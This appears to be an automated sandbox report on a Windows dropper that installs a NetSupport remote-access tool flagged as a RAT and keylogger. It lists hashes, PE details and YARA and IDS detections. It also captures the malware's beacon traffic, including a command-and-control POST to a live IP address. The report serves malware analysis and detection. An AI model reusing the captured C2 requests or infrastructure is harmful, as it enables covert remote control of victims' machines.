                                                                                                    SHA-512:2BEA9BD528513A3C6A54BEAC25096EE200A4E6CCFC2A308AE9CFD1AD8738E2E2DEFD477D59DB527A048E5E9A4FE1FC1D771701DE14EF82B4DBCDC90DF0387630
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.y.~...~...~...w...}...~.......eD.....eD..+...eD..J...eD......eD......eD......eD......Rich~...................PE..L......M.........."!.........................0.....x......................................@..........................H......d...(.......................P.......$L...!..8...........................hE..@............................................text...!........................... ..`.data....Z...0...N..................@....rsrc................f..............@..@.reloc..$L.......N...j..............@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                    File Type:Windows setup INFormation
                                                                                                    Category:dropped
                                                                                                    Size (bytes):328
                                                                                                    Entropy (8bit):4.93007757242403
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:a0S880EeLL6sWqYFcf8KYFEAy1JoHBIr2M2OIAXFYJKRLIkg/LH2yi9vyifjBLWh:JShNvPG1JoHBx2XFhILH4Burn
                                                                                                    MD5:26E28C01461F7E65C402BDF09923D435
                                                                                                    SHA1:1D9B5CFCC30436112A7E31D5E4624F52E845C573
                                                                                                    SHA-256:D96856CD944A9F1587907CACEF974C0248B7F4210F1689C1E6BCAC5FED289368
                                                                                                    SHA-512:C30EC66FECB0A41E91A31804BE3A8B6047FC3789306ADC106C723B3E5B166127766670C7DA38D77D3694D99A8CDDB26BC266EE21DBA60A148CDF4D6EE10D27D7
                                                                                                    Malicious:false
                                                                                                    Preview:; nskbfltr.inf..;..; NS Keyboard Filter..; ..;..; This inf file installs the WDF Framework binaries....[Version]..Signature="$Windows NT$"..Provider=NSL......;..;--- nskbfltr Coinstaller installation ------..;......[nskbfltr.NT.Wdf]..KmdfService = nskbfltr, nskbfltr_wdfsect....[nskbfltr_wdfsect]..KmdfLibraryVersion = 1.5......
                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):33144
                                                                                                    Entropy (8bit):6.737780491933496
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:FFvNhAyi5hHA448qZkSn+EgT8To1iTYiu:FCyoHA448qSSzgI2GQ
                                                                                                    MD5:DCDE2248D19C778A41AA165866DD52D0
                                                                                                    SHA1:7EC84BE84FE23F0B0093B647538737E1F19EBB03
                                                                                                    SHA-256:9074FD40EA6A0CAA892E6361A6A4E834C2E51E6E98D1FFCDA7A9A537594A6917
                                                                                                    SHA-512:C5D170D420F1AEB9BCD606A282AF6E8DA04AE45C83D07FAAACB73FF2E27F4188B09446CE508620124F6D9B447A40A23620CFB39B79F02B04BB9E513866352166
                                                                                                    Malicious:true
                                                                                                    Yara Hits:
                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Downloads\pcicapi.dll, Author: Joe Security
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+-..E~..E~..E~.\.~..E~.\.~..E~...~..E~..D~..E~.\.~..E~.\.~..E~.\.~..E~.\.~..E~...~..E~.\.~..E~Rich..E~........PE..L......U...........!.....2...........<.......P...............................`............@..........................^.......W..d....@..x............X..x)...P......`Q...............................V..@............P..@............................text....1.......2.................. ..`.rdata.......P.......6..............@..@.data...,....`.......F..............@....rsrc...x....@.......H..............@..@.reloc.......P.......P..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):77224
                                                                                                    Entropy (8bit):6.793971095882093
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:zfafvTuNOwphKuyUHTqYXHhrXH4+LIyrxomee/+5IrAee/DIr3:jafLSpAFUzt0+LIyr7eR5IUeCIz
                                                                                                    MD5:325B65F171513086438952A152A747C4
                                                                                                    SHA1:A1D1C397902FF15C4929A03D582B09B35AA70FC0
                                                                                                    SHA-256:26DBB528C270C812423C3359FC54D13C52D459CC0E8BC9B0D192725EDA34E534
                                                                                                    SHA-512:6829555AB3851064C3AAD2D0C121077DB0260790B95BF087B77990A040FEBD35B8B286F1593DCCAA81B24395BD437F5ADD02037418FD5C9C8C78DC0989A9A10D
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 13%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g.V#...#...#...L...2...*.r.&...#...t...L.K.u...L.J.>...L.{."...L.|."...Rich#...........PE..L...c..c.....................J.......!............@.......................... ............@....................................<.......T................]..............................................@...............@............................text.............................. ..`.rdata..,%.......&..................@..@.data....-..........................@....rsrc...T...........................@..@.reloc..p...........................@..B................................................................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Users\Public\Downloads\bild.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:modified
                                                                                                    Size (bytes):15
                                                                                                    Entropy (8bit):2.7329145639793984
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:QJgTG:QkG
                                                                                                    MD5:8AB0D91EF06123198FFAC30AD08A14C7
                                                                                                    SHA1:46D83BB84F74D8F28427314C6084CC9AFE9D1533
                                                                                                    SHA-256:DB50064FEE42FB57DCFD9C4269A682331246224D6108A18DB83ABD400CCECA12
                                                                                                    SHA-512:1AA8560708AD663C4D5D0C2199E2CE472D11748EDA18848AAA3430C6F333BB04DA65DFFF4144BFEEA3860CA30F7F832EC64FF6D5B0731AC8878050601AC7A3A3
                                                                                                    Malicious:false
                                                                                                    Preview:32.7767,-96.797
                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                    Entropy (8bit):7.940358895406796
                                                                                                    TrID:
                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                    File name:file.exe
                                                                                                    File size:2'137'945 bytes
                                                                                                    MD5:b51e761b009c658073fd0dc66c8f808f
                                                                                                    SHA1:8dd8a45980efcae93eec634987396a0a6a3e62e9
                                                                                                    SHA256:bf2165a4bdafb0945c8b370758e6d0b9ab145147e7ddab448a01b3b25c2ad8a7
                                                                                                    SHA512:5566a09c50e5d05435a1edb1a7cefdc375e6f656acc69250ffb1a2a051f1a807eb41abc11a1bc489695a4ab80b11150c8f8d8a9867291ac4a33155397a260367
                                                                                                    SSDEEP:49152:VIfd6RO0EkHbG+Ww6NbHHBp7k5hhelN6YawnqLKwgVR9:VI1P/wYt5ShAiYawbwW
                                                                                                    TLSH:94A52302F9C6C5B2D533083A0A68AB55797DBF342F28DD6FA78D5E1ACA301517338A53
                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........~..............b.......b..<....b......)^...................................................... ....... .......%....... ......
                                                                                                    Icon Hash:1515d4d4442f2d2d
                                                                                                    Entrypoint:0x41d779
                                                                                                    Entrypoint Section:.text
                                                                                                    Digitally signed:false
                                                                                                    Imagebase:0x400000
                                                                                                    Subsystem:windows gui
                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                    Time Stamp:0x5C72EA7E [Sun Feb 24 19:03:26 2019 UTC]
                                                                                                    TLS Callbacks:
                                                                                                    CLR (.Net) Version:
                                                                                                    OS Version Major:5
                                                                                                    OS Version Minor:1
                                                                                                    File Version Major:5
                                                                                                    File Version Minor:1
                                                                                                    Subsystem Version Major:5
                                                                                                    Subsystem Version Minor:1
                                                                                                    Import Hash:00be6e6c4f9e287672c8301b72bdabf3
                                                                                                    Instruction
                                                                                                    call 00007F1DCC83271Fh
                                                                                                    jmp 00007F1DCC832113h
                                                                                                    cmp ecx, dword ptr [0043A1C8h]
                                                                                                    jne 00007F1DCC832285h
                                                                                                    ret
                                                                                                    jmp 00007F1DCC832896h
                                                                                                    and dword ptr [ecx+04h], 00000000h
                                                                                                    mov eax, ecx
                                                                                                    and dword ptr [ecx+08h], 00000000h
                                                                                                    mov dword ptr [ecx+04h], 00430FE8h
                                                                                                    mov dword ptr [ecx], 00431994h
                                                                                                    ret
                                                                                                    push ebp
                                                                                                    mov ebp, esp
                                                                                                    push esi
                                                                                                    push dword ptr [ebp+08h]
                                                                                                    mov esi, ecx
                                                                                                    call 00007F1DCC82581Dh
                                                                                                    mov dword ptr [esi], 004319A0h
                                                                                                    mov eax, esi
                                                                                                    pop esi
                                                                                                    pop ebp
                                                                                                    retn 0004h
                                                                                                    and dword ptr [ecx+04h], 00000000h
                                                                                                    mov eax, ecx
                                                                                                    and dword ptr [ecx+08h], 00000000h
                                                                                                    mov dword ptr [ecx+04h], 004319A8h
                                                                                                    mov dword ptr [ecx], 004319A0h
                                                                                                    ret
                                                                                                    lea eax, dword ptr [ecx+04h]
                                                                                                    mov dword ptr [ecx], 00431988h
                                                                                                    push eax
                                                                                                    call 00007F1DCC83542Eh
                                                                                                    pop ecx
                                                                                                    ret
                                                                                                    push ebp
                                                                                                    mov ebp, esp
                                                                                                    push esi
                                                                                                    mov esi, ecx
                                                                                                    lea eax, dword ptr [esi+04h]
                                                                                                    mov dword ptr [esi], 00431988h
                                                                                                    push eax
                                                                                                    call 00007F1DCC835417h
                                                                                                    test byte ptr [ebp+08h], 00000001h
                                                                                                    pop ecx
                                                                                                    je 00007F1DCC83228Ch
                                                                                                    push 0000000Ch
                                                                                                    push esi
                                                                                                    call 00007F1DCC831852h
                                                                                                    pop ecx
                                                                                                    pop ecx
                                                                                                    mov eax, esi
                                                                                                    pop esi
                                                                                                    pop ebp
                                                                                                    retn 0004h
                                                                                                    push ebp
                                                                                                    mov ebp, esp
                                                                                                    sub esp, 0Ch
                                                                                                    lea ecx, dword ptr [ebp-0Ch]
                                                                                                    call 00007F1DCC8321EEh
                                                                                                    push 00437B58h
                                                                                                    lea eax, dword ptr [ebp-0Ch]
                                                                                                    push eax
                                                                                                    call 00007F1DCC834B16h
                                                                                                    int3
                                                                                                    push ebp
                                                                                                    mov ebp, esp
                                                                                                    sub esp, 0Ch
                                                                                                    Programming Language:
                                                                                                    • [ C ] VS2008 SP1 build 30729
                                                                                                    • [IMP] VS2008 SP1 build 30729
                                                                                                    • [C++] VS2015 UPD3.1 build 24215
                                                                                                    • [EXP] VS2015 UPD3.1 build 24215
                                                                                                    • [RES] VS2015 UPD3 build 24213
                                                                                                    • [LNK] VS2015 UPD3.1 build 24215
                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x38cd00x34.rdata
                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x38d040x3c.rdata
                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x5d0000xe034.rsrc
                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x6c0000x1fd0.reloc
                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x36ee00x54.rdata
                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x319280x40.rdata
                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x300000x25c.rdata
                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x382540x120.rdata
                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                    .text0x10000x2e8640x2ea008c2dd3ebce78edeed565107466ae1d3eFalse0.5908595844504021data6.693477406609911IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                    .rdata0x300000x9aac0x9c00b8d3a709e8e2861298e51f270be0f883False0.45718149038461536data5.133828516884417IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                    .data0x3a0000x213d00xc007a066b052b7178cd1388c71d17dec570False0.2789713541666667data3.2428863859698565IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                    .gfids0x5c0000xe80x2000a8129f1f5d2e8ddcb61343ecd6f891aFalse0.33984375data2.0959167744603624IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                    .rsrc0x5d0000xe0340xe200d62594e063ef25acc085c21831d77a75False0.6341779590707964data6.802287495720703IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                    .reloc0x6c0000x1fd00x2000983e78af74da826d9233ebaa3055869aFalse0.8060302734375data6.687357530503152IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                    PNG0x5d6440xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced1.0027729636048528
                                                                                                    PNG0x5e18c0x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced0.9363390441839495
                                                                                                    RT_ICON0x5f7380x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors0.47832369942196534
                                                                                                    RT_ICON0x5fca00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors0.5410649819494585
                                                                                                    RT_ICON0x605480xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors0.4933368869936034
                                                                                                    RT_ICON0x613f00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m0.5390070921985816
                                                                                                    RT_ICON0x618580x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m0.41393058161350843
                                                                                                    RT_ICON0x629000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m0.3479253112033195
                                                                                                    RT_ICON0x64ea80x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9809269502193401
                                                                                                    RT_DIALOG0x68c1c0x2a2data0.5296735905044511
                                                                                                    RT_DIALOG0x68ec00x13adata0.6624203821656051
                                                                                                    RT_DIALOG0x68ffc0xf2data0.71900826446281
                                                                                                    RT_DIALOG0x690f00x14edata0.5868263473053892
                                                                                                    RT_DIALOG0x692400x318data0.476010101010101
                                                                                                    RT_DIALOG0x695580x24adata0.6262798634812287
                                                                                                    RT_STRING0x697a40x1fcdata0.421259842519685
                                                                                                    RT_STRING0x699a00x246data0.41924398625429554
                                                                                                    RT_STRING0x69be80x1dcdata0.5105042016806722
                                                                                                    RT_STRING0x69dc40xdcdata0.65
                                                                                                    RT_STRING0x69ea00x468data0.375
                                                                                                    RT_STRING0x6a3080x164data0.5056179775280899
                                                                                                    RT_STRING0x6a46c0xe4data0.6359649122807017
                                                                                                    RT_STRING0x6a5500x158data0.4563953488372093
                                                                                                    RT_STRING0x6a6a80xe8data0.5948275862068966
                                                                                                    RT_STRING0x6a7900xe6data0.5695652173913044
                                                                                                    RT_GROUP_ICON0x6a8780x68data0.7019230769230769
                                                                                                    RT_MANIFEST0x6a8e00x753XML 1.0 document, ASCII text, with CRLF line terminators0.3957333333333333
                                                                                                    DLLImport
                                                                                                    KERNEL32.dllGetLastError, SetLastError, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, GetTickCount, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer
                                                                                                    gdiplus.dllGdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc
                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                    2024-11-01T17:56:32.935205+01002827745ETPRO MALWARE NetSupport RAT CnC Activity1192.168.2.449730185.215.113.64443TCP
                                                                                                    2024-11-01T17:56:51.883908+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow1172.202.163.200443192.168.2.449732TCP
                                                                                                    2024-11-01T17:57:30.205978+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow1172.202.163.200443192.168.2.449738TCP
                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Nov 1, 2024 17:56:32.935204983 CET49730443192.168.2.4185.215.113.64
                                                                                                    Nov 1, 2024 17:56:32.935257912 CET44349730185.215.113.64192.168.2.4
                                                                                                    Nov 1, 2024 17:56:32.935323000 CET49730443192.168.2.4185.215.113.64
                                                                                                    Nov 1, 2024 17:56:33.006663084 CET49730443192.168.2.4185.215.113.64
                                                                                                    Nov 1, 2024 17:56:33.006688118 CET44349730185.215.113.64192.168.2.4
                                                                                                    Nov 1, 2024 17:56:33.006757975 CET44349730185.215.113.64192.168.2.4
                                                                                                    Nov 1, 2024 17:56:33.051711082 CET4973180192.168.2.4104.26.1.231
                                                                                                    Nov 1, 2024 17:56:33.057219982 CET8049731104.26.1.231192.168.2.4
                                                                                                    Nov 1, 2024 17:56:33.057282925 CET4973180192.168.2.4104.26.1.231
                                                                                                    Nov 1, 2024 17:56:33.057429075 CET4973180192.168.2.4104.26.1.231
                                                                                                    Nov 1, 2024 17:56:33.062906027 CET8049731104.26.1.231192.168.2.4
                                                                                                    Nov 1, 2024 17:56:34.159030914 CET8049731104.26.1.231192.168.2.4
                                                                                                    Nov 1, 2024 17:56:34.159092903 CET4973180192.168.2.4104.26.1.231
                                                                                                    Nov 1, 2024 17:58:22.969580889 CET4973180192.168.2.4104.26.1.231
                                                                                                    Nov 1, 2024 17:58:22.976263046 CET8049731104.26.1.231192.168.2.4
                                                                                                    Nov 1, 2024 17:58:22.976325989 CET4973180192.168.2.4104.26.1.231
                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Nov 1, 2024 17:56:33.014236927 CET5839853192.168.2.41.1.1.1
                                                                                                    Nov 1, 2024 17:56:33.047442913 CET53583981.1.1.1192.168.2.4
                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                    Nov 1, 2024 17:56:33.014236927 CET192.168.2.41.1.1.10x1713Standard query (0)geo.netsupportsoftware.comA (IP address)IN (0x0001)false
                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                    Nov 1, 2024 17:56:33.047442913 CET1.1.1.1192.168.2.40x1713No error (0)geo.netsupportsoftware.com104.26.1.231A (IP address)IN (0x0001)false
                                                                                                    Nov 1, 2024 17:56:33.047442913 CET1.1.1.1192.168.2.40x1713No error (0)geo.netsupportsoftware.com172.67.68.212A (IP address)IN (0x0001)false
                                                                                                    Nov 1, 2024 17:56:33.047442913 CET1.1.1.1192.168.2.40x1713No error (0)geo.netsupportsoftware.com104.26.0.231A (IP address)IN (0x0001)false
                                                                                                    • 185.215.113.64connection: keep-alivecmd=pollinfo=1ack=1
                                                                                                    • geo.netsupportsoftware.com
                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    0192.168.2.449730185.215.113.644431456C:\Users\Public\Downloads\bild.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Nov 1, 2024 17:56:33.006663084 CET220OUTPOST http://185.215.113.64/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 185.215.113.64Connection: Keep-AliveCMD=POLLINFO=1ACK=1
                                                                                                    Data Raw:
                                                                                                    Data Ascii:


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    1192.168.2.449731104.26.1.231801456C:\Users\Public\Downloads\bild.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Nov 1, 2024 17:56:33.057429075 CET118OUTGET /location/loca.asp HTTP/1.1
                                                                                                    Host: geo.netsupportsoftware.com
                                                                                                    Connection: Keep-Alive
                                                                                                    Cache-Control: no-cache
                                                                                                    Nov 1, 2024 17:56:34.159030914 CET788INHTTP/1.1 200 OK
                                                                                                    Date: Fri, 01 Nov 2024 16:56:34 GMT
                                                                                                    Content-Type: text/html; Charset=utf-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    CF-Ray: 8dbd6b39fe822c89-DFW
                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    Cache-Control: private
                                                                                                    Set-Cookie: ASPSESSIONIDACBSDDAB=GDLDEFECCJBBLHAPBAMPGNAE; path=/
                                                                                                    cf-apo-via: origin,host
                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                    X-Powered-By: ASP.NET
                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K80Y9jXFPXmwmqQtWtM8zwQ5Cvl9Yj3an7rM%2F40NQqWRNXNlaK2UMSY1j32myLIZPD2qQtUkzWvf9QSKJY4RY8R61cG%2BGaJToyxDbP3DrgT25UhCDSSt%2BdSuA4%2Bq6n1T1AN5KhospIx0WXj%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                    Server: cloudflare
                                                                                                    Data Raw: 66 0d 0a 33 32 2e 37 37 36 37 2c 2d 39 36 2e 37 39 37 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: f32.7767,-96.7970


                                                                                                    Click to jump to process

                                                                                                    Click to jump to process

                                                                                                    Click to dive into process behavior distribution

                                                                                                    Click to jump to process

                                                                                                    Target ID:0
                                                                                                    Start time:12:56:30
                                                                                                    Start date:01/11/2024
                                                                                                    Path:C:\Users\user\Desktop\file.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                    Imagebase:0x9f0000
                                                                                                    File size:2'137'945 bytes
                                                                                                    MD5 hash:B51E761B009C658073FD0DC66C8F808F
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000000.00000003.1663707824.0000000004D4E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000003.1663707824.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000000.00000003.1663707824.0000000004D5E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    Reputation:low
                                                                                                    Has exited:true

                                                                                                    Target ID:1
                                                                                                    Start time:12:56:31
                                                                                                    Start date:01/11/2024
                                                                                                    Path:C:\Users\Public\Downloads\bild.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Users\Public\Downloads\bild.exe"
                                                                                                    Imagebase:0xf20000
                                                                                                    File size:105'848 bytes
                                                                                                    MD5 hash:8D9709FF7D9C83BD376E01912C734F0A
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000001.00000000.1666036569.0000000000F22000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000001.00000002.3511143904.000000006C790000.00000002.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000001.00000002.3509963877.0000000000F22000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000001.00000002.3509543073.00000000007D2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Downloads\bild.exe, Author: Joe Security
                                                                                                    Antivirus matches:
                                                                                                    • Detection: 29%, ReversingLabs
                                                                                                    Reputation:moderate
                                                                                                    Has exited:false

                                                                                                    Reset < >

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:10.4%
                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                      Signature Coverage:9.7%
                                                                                                      Total number of Nodes:1492
                                                                                                      Total number of Limit Nodes:22
